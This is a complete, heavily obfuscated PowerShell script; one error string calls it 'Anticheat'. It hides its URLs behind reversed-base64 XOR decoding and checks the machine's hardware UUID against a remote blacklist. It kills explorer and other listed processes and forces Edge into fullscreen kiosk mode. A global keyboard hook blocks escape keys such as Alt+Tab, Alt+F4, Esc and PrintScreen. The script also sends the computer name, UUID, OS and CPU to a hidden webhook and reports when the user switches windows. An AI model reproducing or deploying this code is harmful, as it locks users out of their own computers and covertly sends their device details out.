$ErrorActionPreference = "Continue"

Add-Type -AssemblyName System.Windows.Forms

function PDNlZGWAoWkf($title, $text, $duration) {
    try {
        $balloon = New-Object System.Windows.Forms.NotifyIcon
        $balloon.Icon = [System.Drawing.SystemIcons]::Warning
        $balloon.BalloonTipTitle = $title
        $balloon.BalloonTipText = $text
        $balloon.Visible = $true
        $balloon.ShowBalloonTip($duration * 1000)
        Start-Sleep -Seconds $duration
        $balloon.Dispose()
    } catch { }
}

function yPZgxulnSjIn($link, $title, $color, $fields) {
    try {
        $embedBody = @{
            embeds = @(
                @{
                    title = $title
                    color = $color
                    fields = $fields
                }
            )
        } | ConvertTo-Json -Depth 10

        Invoke-RestMethod -Uri $link -Method Post -ContentType "application/json" -Body $embedBody -ErrorAction Stop | Out-Null
    } catch {
        PDNlZGWAoWkf "Webhook Error" "Failed to send webhook: $($_.Exception.Message)" 5
    }
}

function rgiDyGwGtEMM($reversed, $key) {
    try {
        $charArr = $reversed.ToCharArray()
        [array]::Reverse($charArr)
        $unreversed = -join $charArr
        $decoded = [System.Convert]::FromBase64String($unreversed)
        $keyBytes = [System.Text.Encoding]::UTF8.GetBytes($key)
        $result = New-Object byte[] $decoded.Length
        for ($i = 0; $i -lt $decoded.Length; $i++) {
            $result[$i] = $decoded[$i] -bxor $keyBytes[$i % $keyBytes.Length]
        }
        return [System.Text.Encoding]::UTF8.GetString($result)
    } catch {
        PDNlZGWAoWkf "Decode Error" "Failed to decode string: $($_.Exception.Message)" 5
        return $reversed
    }
}

$FFHMMrmQCXkA = @("a2c6a683", "ab1b7290", "78496dd3", "9b5b17d0", "651930ea", "6d5514c9", "b8be0e77", "d8ab78bf", "e8028a9e", "ff4786ab", "3b5c601c", "c9c7caf7", "d804355d", "82976f38", "56f1568d", "1709e33f", "0cb3d840", "b6ba6008", "d300e697", "27ff2c09", "ba81a882", "d6e8ba93", "366e722d", "2975064f", "0e9f212b", "d7f1a2a1", "feffdb31", "8c3dace0", "cc7a4083", "ea7c74e9", "657dab81", "a94dcead", "7b965892", "5db1b09d", "601506b2", "619f42e3", "b5d15771", "f301aa49", "48a9703f", "bcfec513", "9198d2e2", "b312152b", "28ef627d", "c56a4cdb", "0bcc016d", "d77a9314", "62373ddf", "2d259a73", "cf47f11d", "0c4cecdb", "18f86a52", "cb29d258", "5f373d96", "48dd786b", "076bc296", "1c1c0610", "382c21d5", "7879fddc", "244e130d", "57b3416f", "2e963ffb", "c7e8189b", "93856247", "e1bccfc9", "3a7d4af5", "7f2ab5cd", "068f81a8", "34aff989", "4a6e766e", "ecc6c109", "bea32fdd", "a511d9dc", "2e9a9eb4", "32f4f7f5", "f9e78a3d", "f25cca0b", "5c023da8", "88d3dc76", "a26b8792", "d37a7988", "b8b39895", "67be6a42", "810d1487", "3c281aa1", "136b3dfe", "0aca0e84", "7a074ad9", "0c39d0e1", "2dfb3f56", "0df3719e", "f9d8cf1e", "bc94c34d", "10baa572", "ed42eb6d", "3ae22f90", "896d5498", "48f3eea7", "84424fc2", "095e112f", "9511686d", "d5c2c0b6", "65491496", "fab058b1", "f1eff666")
    $MhZYukRuRKjA = -join @($FFHMMrmQCXkA[84], $FFHMMrmQCXkA[102], $FFHMMrmQCXkA[87], $FFHMMrmQCXkA[46])
    $ZvKFkseChgPO = -join @($FFHMMrmQCXkA[1], $FFHMMrmQCXkA[34], $FFHMMrmQCXkA[7], $FFHMMrmQCXkA[23])
    $sJCAkVsKrJON = -join @($FFHMMrmQCXkA[37], $FFHMMrmQCXkA[10], $FFHMMrmQCXkA[70], $FFHMMrmQCXkA[65])
    $WHwmjPrSWTBN = -join @($FFHMMrmQCXkA[94], $FFHMMrmQCXkA[99], $FFHMMrmQCXkA[101], $FFHMMrmQCXkA[43])
    $ShOsGqDBzlhf = -join @($FFHMMrmQCXkA[77], $FFHMMrmQCXkA[53], $FFHMMrmQCXkA[22], $FFHMMrmQCXkA[6])
    $iFZHySbCDiwb = -join @($FFHMMrmQCXkA[58], $FFHMMrmQCXkA[89], $FFHMMrmQCXkA[25], $FFHMMrmQCXkA[81])
    $coxkIAOZBbxa = -join @($FFHMMrmQCXkA[79], $FFHMMrmQCXkA[76], $FFHMMrmQCXkA[14], $FFHMMrmQCXkA[54])
    $UinjwTeOpRlL = -join @($FFHMMrmQCXkA[88], $FFHMMrmQCXkA[93], $FFHMMrmQCXkA[45], $FFHMMrmQCXkA[51])
    $LZrZWGIgtuHr = -join @($FFHMMrmQCXkA[39], $FFHMMrmQCXkA[40], $FFHMMrmQCXkA[4], $FFHMMrmQCXkA[98])
    $FKXGiLJlkgaE = -join @($FFHMMrmQCXkA[44], $FFHMMrmQCXkA[56], $FFHMMrmQCXkA[33], $FFHMMrmQCXkA[17])
    $ThvNbJNOVesJ = -join @($FFHMMrmQCXkA[75], $FFHMMrmQCXkA[61], $FFHMMrmQCXkA[15], $FFHMMrmQCXkA[21])
    $aeBNMdjbDMvV = -join @($FFHMMrmQCXkA[96], $FFHMMrmQCXkA[30], $FFHMMrmQCXkA[11], $FFHMMrmQCXkA[67])
    $QzwONvgkLSWU = -join @($FFHMMrmQCXkA[83], $FFHMMrmQCXkA[86], $FFHMMrmQCXkA[3], $FFHMMrmQCXkA[59])
    $WwWGkybyUqWu = -join @($FFHMMrmQCXkA[80], $FFHMMrmQCXkA[97], $FFHMMrmQCXkA[82], $FFHMMrmQCXkA[95])
    $ENUTSpXeFvlm = -join @($FFHMMrmQCXkA[74], $FFHMMrmQCXkA[103], $FFHMMrmQCXkA[63], $FFHMMrmQCXkA[24])
    $RTREgGeloMNd = -join @($FFHMMrmQCXkA[29], $FFHMMrmQCXkA[60], $FFHMMrmQCXkA[0], $FFHMMrmQCXkA[49])
    $ohLCqRTjsleH = -join @($FFHMMrmQCXkA[35], $FFHMMrmQCXkA[2], $FFHMMrmQCXkA[73], $FFHMMrmQCXkA[62])
    $usQJmetPzdfI = -join @($FFHMMrmQCXkA[68], $FFHMMrmQCXkA[36], $FFHMMrmQCXkA[90], $FFHMMrmQCXkA[12])
    $umlaEruUWObT = -join @($FFHMMrmQCXkA[26], $FFHMMrmQCXkA[20], $FFHMMrmQCXkA[5], $FFHMMrmQCXkA[13])
    $kwEQYgTWYjld = -join @($FFHMMrmQCXkA[91], $FFHMMrmQCXkA[38], $FFHMMrmQCXkA[85], $FFHMMrmQCXkA[19])
    $PweKqOvdHiYN = -join @($FFHMMrmQCXkA[31], $FFHMMrmQCXkA[57], $FFHMMrmQCXkA[28], $FFHMMrmQCXkA[92])
    $qBusfxzYLxIy = -join @($FFHMMrmQCXkA[100], $FFHMMrmQCXkA[52], $FFHMMrmQCXkA[50], $FFHMMrmQCXkA[66])
    $TFGLxmWZlQgc = -join @($FFHMMrmQCXkA[72], $FFHMMrmQCXkA[71], $FFHMMrmQCXkA[55], $FFHMMrmQCXkA[16])
    $QNFqgrZiLOzK = -join @($FFHMMrmQCXkA[8], $FFHMMrmQCXkA[27], $FFHMMrmQCXkA[69], $FFHMMrmQCXkA[78])
    $kVOJUNmrhSyP = -join @($FFHMMrmQCXkA[48], $FFHMMrmQCXkA[41], $FFHMMrmQCXkA[18], $FFHMMrmQCXkA[64])
    $yIitSqoiOBbd = -join @($FFHMMrmQCXkA[47], $FFHMMrmQCXkA[32], $FFHMMrmQCXkA[9], $FFHMMrmQCXkA[42])

$MozmQULZQTTf = "TJwCF41VZBFUMw1Xe9wHJYFUNR1XXc1RXtBARoUSeBkECdUW"
$vlsNLcTdvXSz = "==gZigCAlRRJBFRBN43YGVWHcFAVRZVJrpCUXsmDWZAA791DoslUpYRfHMgEHMkXmFkZqFAAYJxZzQgKBQXZMBkUYtwDchBVVpQUAA1AEYwABYACKAQAVVwUOVxXZ9VXVxVRJtASW1EDXdAHGQ0XWJUWS9hFIQkEFZRC"
$IhIXrzCinZdc = "==gFSslCcdQBKAHHPwwAO4RUZEBUS4FWghQFfFHHLsAAbYxDXJRWLcAFXBEFHcxCFlVUNJ0ABZxGbJRQEdkD"
$ecqommozktIQ = "==gRWIEWAJmFax1VJkRWZMEVFRVUt9gRcRiTe1wBNB0DTFUDZplRUpUQXNEDCFVUfYEVL9hFcFkQRUxW"
$vFJvyKUnwDej = "=gjEAQRWQYAESsxROlVVHQUURZERUYxUaxgFbdgGYsRFBIkCBs0CgAhEbcERTFUDah0TBYEGYQhVREwQLoxY"
$dzEocElhHZPz = "==QFPkFDRQ0UCFESbg1EGRUAcVURSJxFQcRUbFxFRd0Z"
$MNSLlBerjEKI = "RRlEXBFUCQkSeJlCGt0VJdxESBUM"
$VJZLzBVfQern = "XlVBrYRRJcUCVEgd"
$DzCHKlhbJfGt = "==QIvQjK"
$pMtidDvRMQRc = "K41WQAUXlRURG91BNswZ"
$hfiuFlcSeDCE = "gJWJ"
$mxIvPCVwnjcB = "KgFXFVEBzUkVBwVc"
$IyQHSnStrmDB = "==AQFFVFkFxDOg1SBZAY"
$VbBZmIaPwnuI = "=YBRzRBUWBkVK5lVQcFJ"
$PabmJdaCholW = "==gUIAlM"
$flqwxvWrdVGe = "==QARxFAY1wJ"
$uaOzbaTovcWw = "==AEM5VQDZBUQdUGYlQRAQhAXdEQNgQXaVFVVNBAAVlRM51b"
$nqHkoCglKZnj = "dNQRWlFXcZBU2UEWZ5lFFRwZ"
$AKZEZrnExSKf = "==wHd1QDVUBAVghXH4kUZUlVQdgW0VxGAMlRb1VFUxVQM4lWWUgCJwAM"
$PUkSielGLoUq = "=YRAVVhBNA0CcN1FAVQWRZBWSNUWYtxJ"
$AhtdXXOVgiHV = "AQAARpED"
$KlldqMEnuWyG = "==wANNFTVRgVGYUC"
$VZZIVJRxhUje = "UlEUPZ0BXYVDJ1xV"
$iFqhOnQvsWCV = "CFQVXYQFKYEDbtAXBpUXCpEI"
$NKozyANpNQHy = "MsAWFZhUX5hJ"
$kIQGZjTgckBI = "==wBUJVR1IlVTBRY"

try {
    $qSGrxKJeRqpe = rgiDyGwGtEMM $MozmQULZQTTf $MhZYukRuRKjA
    $uPFKlLBxdGzz = rgiDyGwGtEMM $vlsNLcTdvXSz $ZvKFkseChgPO
    $qMngptDkmciq = rgiDyGwGtEMM $IhIXrzCinZdc $sJCAkVsKrJON
    $fSFoxyvsvWAp = rgiDyGwGtEMM $ecqommozktIQ $WHwmjPrSWTBN
    $ZLUBqSIbyDem = rgiDyGwGtEMM $vFJvyKUnwDej $ShOsGqDBzlhf
    $YFLkQwyQcmnB = rgiDyGwGtEMM $dzEocElhHZPz $iFZHySbCDiwb
    $LywEtOfRjOGk = rgiDyGwGtEMM $MNSLlBerjEKI $coxkIAOZBbxa
    $KUuACeNFHquN = rgiDyGwGtEMM $VJZLzBVfQern $UinjwTeOpRlL
    $ovJgogHGxhvA = rgiDyGwGtEMM $DzCHKlhbJfGt $LZrZWGIgtuHr
    $zKEkcbrTLlji = rgiDyGwGtEMM $pMtidDvRMQRc $FKXGiLJlkgaE
    $whHZmquwXiYy = rgiDyGwGtEMM $hfiuFlcSeDCE $ThvNbJNOVesJ
    $iHLRieaCyLCI = rgiDyGwGtEMM $mxIvPCVwnjcB $aeBNMdjbDMvV
    $CFHcVAFfLVut = rgiDyGwGtEMM $IyQHSnStrmDB $QzwONvgkLSWU
    $cHsFhIghhCcJ = rgiDyGwGtEMM $VbBZmIaPwnuI $WwWGkybyUqWu
    $ANjTEsNtNyUY = rgiDyGwGtEMM $PabmJdaCholW $ENUTSpXeFvlm
    $EPWZCoPCtkoN = rgiDyGwGtEMM $flqwxvWrdVGe $RTREgGeloMNd
    $ZtDwuTTsRSBz = rgiDyGwGtEMM $uaOzbaTovcWw $ohLCqRTjsleH
    $zMXthwpjSDkZ = rgiDyGwGtEMM $nqHkoCglKZnj $usQJmetPzdfI
    $rhJEBMpeORXw = rgiDyGwGtEMM $AKZEZrnExSKf $umlaEruUWObT
    $ashuFFUSDXTv = rgiDyGwGtEMM $PUkSielGLoUq $kwEQYgTWYjld
    $XTlZgPKmtkzu = rgiDyGwGtEMM $AhtdXXOVgiHV $PweKqOvdHiYN
    $KQZjviXeMufQ = rgiDyGwGtEMM $KlldqMEnuWyG $qBusfxzYLxIy
    $deOJkUKFDzcU = rgiDyGwGtEMM $VZZIVJRxhUje $TFGLxmWZlQgc
    $VTMVGOGPwfyz = rgiDyGwGtEMM $iFqhOnQvsWCV $QNFqgrZiLOzK
    $jZWuNbEWEWtN = rgiDyGwGtEMM $NKozyANpNQHy $kVOJUNmrhSyP
    $BlcMthIQWFHd = rgiDyGwGtEMM $kIQGZjTgckBI $yIitSqoiOBbd
    try { $ZLUBqSIbyDem = $ZLUBqSIbyDem | ConvertFrom-Json } catch { }
} catch { }


try {
$TlNkDkkldyWP = "Unknown"
try { $TlNkDkkldyWP = (Get-CimInstance -Class Win32_ComputerSystemProduct).UUID } catch { }

try {
    $XSrgfVBNpZnk = (Invoke-WebRequest -Uri $qMngptDkmciq -UseBasicParsing -ErrorAction Stop).Content
} catch { 
    PDNlZGWAoWkf "Blacklist Check Error" "Failed to check blacklist. Continuing..." 5
    $XSrgfVBNpZnk = ""
}

if ($XSrgfVBNpZnk -match $TlNkDkkldyWP) {
    PDNlZGWAoWkf $EPWZCoPCtkoN $ZtDwuTTsRSBz 10
    exit 0
}

try {
    $BPkZTkhvhAlU = (Invoke-WebRequest -Uri $fSFoxyvsvWAp -UseBasicParsing -ErrorAction Stop).Content.Trim().ToLower()
} catch { 
    PDNlZGWAoWkf "Status Check Error" "Failed to check status. Continuing..." 5
    $BPkZTkhvhAlU = "false"
}

if ($BPkZTkhvhAlU -eq "true") {
    Write-Host $ashuFFUSDXTv
    exit 0
}

try {
    foreach ($CGjOhJWYSuwO in $ZLUBqSIbyDem) {
        $naeGNBktTAND = $CGjOhJWYSuwO -replace "\.exe`$",""
        if (Get-Process -Name $naeGNBktTAND -ErrorAction SilentlyContinue) {
            if ($CGjOhJWYSuwO -notmatch "\.exe`$") {
                $CGjOhJWYSuwO = "$CGjOhJWYSuwO.exe"
            }
            try { taskkill /F /IM $CGjOhJWYSuwO /T 2>&1 | Out-Null } catch {}
        }
    }
} catch { }

if (Get-Process -Name "explorer" -ErrorAction SilentlyContinue) {
    try { taskkill /F /IM $deOJkUKFDzcU /T 2>&1 | Out-Null } catch {}
}

try {
    Start-Process $KQZjviXeMufQ "--kiosk `"$qSGrxKJeRqpe`" --edge-kiosk-type=fullscreen --no-first-run"
} catch {
    PDNlZGWAoWkf "Browser Error" "Failed to launch Edge Kiosk. Continuing..." 5
}

Start-Sleep -Seconds 3

    $NdbnPCFZFZoW = 'using System; using System.Runtime.InteropServices; using System.Diagnostics; public class KeyBlock { private const int WH_KEYBOARD_LL = 13; private const int WM_KEYDOWN = 0x0100; private const int WM_SYSKEYDOWN = 0x0104; [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)] private static extern IntPtr SetWindowsHookEx(int idHook, LowLevelKeyboardProc lpfn, IntPtr hMod, uint dwThreadId); [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)] [return: MarshalAs(UnmanagedType.Bool)] private static extern bool UnhookWindowsHookEx(IntPtr hhk); [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)] private static extern IntPtr CallNextHookEx(IntPtr hhk, int nCode, IntPtr wParam, IntPtr lParam); [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)] private static extern IntPtr GetModuleHandle(string lpModuleName); [DllImport("user32.dll")] public static extern IntPtr GetForegroundWindow(); [DllImport("user32.dll", SetLastError=true)] public static extern uint GetWindowThreadProcessId(IntPtr hWnd, out uint processId); public delegate IntPtr LowLevelKeyboardProc(int nCode, IntPtr wParam, IntPtr lParam); private static LowLevelKeyboardProc _proc = HookCallback; private static IntPtr _hookID = IntPtr.Zero; public static void BlockKeys() { if (_hookID == IntPtr.Zero) { using (Process curProcess = Process.GetCurrentProcess()) using (ProcessModule curModule = curProcess.MainModule) { _hookID = SetWindowsHookEx(WH_KEYBOARD_LL, _proc, GetModuleHandle(curModule.ModuleName), 0); } } } public static void UnblockKeys() { if (_hookID != IntPtr.Zero) { UnhookWindowsHookEx(_hookID); _hookID = IntPtr.Zero; } } private static IntPtr HookCallback(int nCode, IntPtr wParam, IntPtr lParam) { if (nCode >= 0 && (wParam == (IntPtr)WM_KEYDOWN || wParam == (IntPtr)WM_SYSKEYDOWN)) { int vkCode = Marshal.ReadInt32(lParam); bool alt = (Marshal.ReadInt32(lParam, 8) & 32) != 0; if (vkCode == 91 || vkCode == 92) return (IntPtr)1; if (vkCode == 9 && alt) return (IntPtr)1; if (vkCode == 27 && alt) return (IntPtr)1; if (vkCode == 27) return (IntPtr)1; if (vkCode == 115 && alt) return (IntPtr)1; if (vkCode == 0x2C) return (IntPtr)1; } return CallNextHookEx(_hookID, nCode, wParam, lParam); } }'

try {
    Add-Type -TypeDefinition $NdbnPCFZFZoW
} catch { 
    PDNlZGWAoWkf "Anticheat Error" "Failed to compile hook: $($_.Exception.Message)" 5
}

try {
    [KeyBlock]::BlockKeys()
} catch {
    PDNlZGWAoWkf "Hook Error" "Failed to set global keyboard hook." 5
}

$FSiMeeyauNKM = $env:COMPUTERNAME
$HVUUyWSfJnLN = "Unknown"
$LtucfhqLDDRx = "Unknown"
try { $HVUUyWSfJnLN = (Get-CimInstance -Class Win32_OperatingSystem).Caption } catch {}
try { $LtucfhqLDDRx = (Get-CimInstance -Class Win32_Processor).Name } catch {}

$hcLzpuRGAfOv = (Get-Item "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" -ErrorAction SilentlyContinue).VersionInfo.ProductVersion
if (-not $hcLzpuRGAfOv) {
    $hcLzpuRGAfOv = (Get-Item "C:\Program Files\Microsoft\Edge\Application\msedge.exe" -ErrorAction SilentlyContinue).VersionInfo.ProductVersion
}
if (-not $hcLzpuRGAfOv) { $hcLzpuRGAfOv = "Unknown" }

$EUmbmkZPoQhk = Get-Date -Format "HH:mm:ss | dd/MM/yyyy"

$deMgZmsVXEFY = @(
    @{ name = $KUuACeNFHquN; value = $FSiMeeyauNKM; inline = $true }
    @{ name = $ovJgogHGxhvA; value = $TlNkDkkldyWP; inline = $true }
    @{ name = $zKEkcbrTLlji; value = $HVUUyWSfJnLN; inline = $false }
    @{ name = $whHZmquwXiYy; value = $LtucfhqLDDRx; inline = $false }
    @{ name = $iHLRieaCyLCI; value = $hcLzpuRGAfOv; inline = $true }
    @{ name = $CFHcVAFfLVut; value = $EUmbmkZPoQhk; inline = $true }
)
yPZgxulnSjIn $uPFKlLBxdGzz $YFLkQwyQcmnB 3066993 $deMgZmsVXEFY

$global:vviqtaOnXtWl = $true

$JgyTAtXvHIOZ = Start-Job -ScriptBlock {
    param($url)
    while ($true) {
        try {
            $HeWQDqcylfin = (Invoke-WebRequest -Uri $url -UseBasicParsing -ErrorAction Stop).Content.Trim().ToLower()
            if ($HeWQDqcylfin -eq "true") {
                return "completed"
            }
        } catch {}
        Start-Sleep -Seconds 20
    }
} -ArgumentList $fSFoxyvsvWAp

while ($global:vviqtaOnXtWl) {
    try {
        for ($i = 0; $i -lt 50; $i++) {
            [System.Windows.Forms.Application]::DoEvents()
            Start-Sleep -Milliseconds 10
        }

        if (Get-Process -Name "explorer" -ErrorAction SilentlyContinue) {
            try { taskkill /F /IM $deOJkUKFDzcU /T 2>&1 | Out-Null } catch {}
        }

        if ($JgyTAtXvHIOZ.State -eq "Completed") {
            $condition = [string](Receive-Job -Job $JgyTAtXvHIOZ)
            if ($condition -match "completed") {
                try { [KeyBlock]::UnblockKeys() } catch { }
                taskkill /F /IM $KQZjviXeMufQ /T 2>&1 | Out-Null
                Start-Process $deOJkUKFDzcU
                $global:vviqtaOnXtWl = $false
                break
            }
        }

        $CVcYtJNOYLxO = 0
        try { $CVcYtJNOYLxO = [KeyBlock]::GetForegroundWindow() } catch { }
        
        if ($CVcYtJNOYLxO -ne 0) {
            $ExsScZqdrUSt = 0
            try { [KeyBlock]::GetWindowThreadProcessId($CVcYtJNOYLxO, [ref]$ExsScZqdrUSt) | Out-Null } catch { }
            $yuUIlNZdixSC = $null
            try { $yuUIlNZdixSC = Get-Process -Id $ExsScZqdrUSt -ErrorAction Stop } catch {}

            if ($yuUIlNZdixSC -and $yuUIlNZdixSC.ProcessName -ne $XTlZgPKmtkzu) {
                $QKNXRtKtiCOb = @(
                    @{ name = $KUuACeNFHquN; value = $FSiMeeyauNKM; inline = $true }
                    @{ name = $ovJgogHGxhvA; value = $TlNkDkkldyWP; inline = $true }
                    @{ name = $cHsFhIghhCcJ; value = $yuUIlNZdixSC.ProcessName; inline = $false }
                    @{ name = $ANjTEsNtNyUY; value = (Get-Date -Format "HH:mm:ss | dd/MM/yyyy"); inline = $false }
                )
                yPZgxulnSjIn $uPFKlLBxdGzz $LywEtOfRjOGk 15158332 $QKNXRtKtiCOb

                PDNlZGWAoWkf $zMXthwpjSDkZ $rhJEBMpeORXw 5

                try { [KeyBlock]::UnblockKeys() } catch { }
                taskkill /F /IM $KQZjviXeMufQ /T 2>&1 | Out-Null
                Start-Process $deOJkUKFDzcU
                
                $global:vviqtaOnXtWl = $false
                break
            }
        }
    } catch {
        # Suppress loop errors
    }
}

try { [KeyBlock]::UnblockKeys() } catch { }
Stop-Job -Job $JgyTAtXvHIOZ -ErrorAction SilentlyContinue
Remove-Job -Job $JgyTAtXvHIOZ -Force -ErrorAction SilentlyContinue
Get-Job | Where-Object { $_.State -ne "Running" } | Remove-Job -Force -ErrorAction SilentlyContinue

} catch {
    $sKGsRRxtmTyr = @(
        @{ name = $KUuACeNFHquN; value = $env:COMPUTERNAME; inline = $true }
        @{ name = $jZWuNbEWEWtN; value = $_.Exception.Message; inline = $false }
        @{ name = $BlcMthIQWFHd; value = $_.ScriptStackTrace; inline = $false }
    )
    yPZgxulnSjIn $uPFKlLBxdGzz $VTMVGOGPwfyz 16711680 $sKGsRRxtmTyr
    PDNlZGWAoWkf "Script Error" "Non-fatal error encountered: $($_.Exception.Message)" 5
}
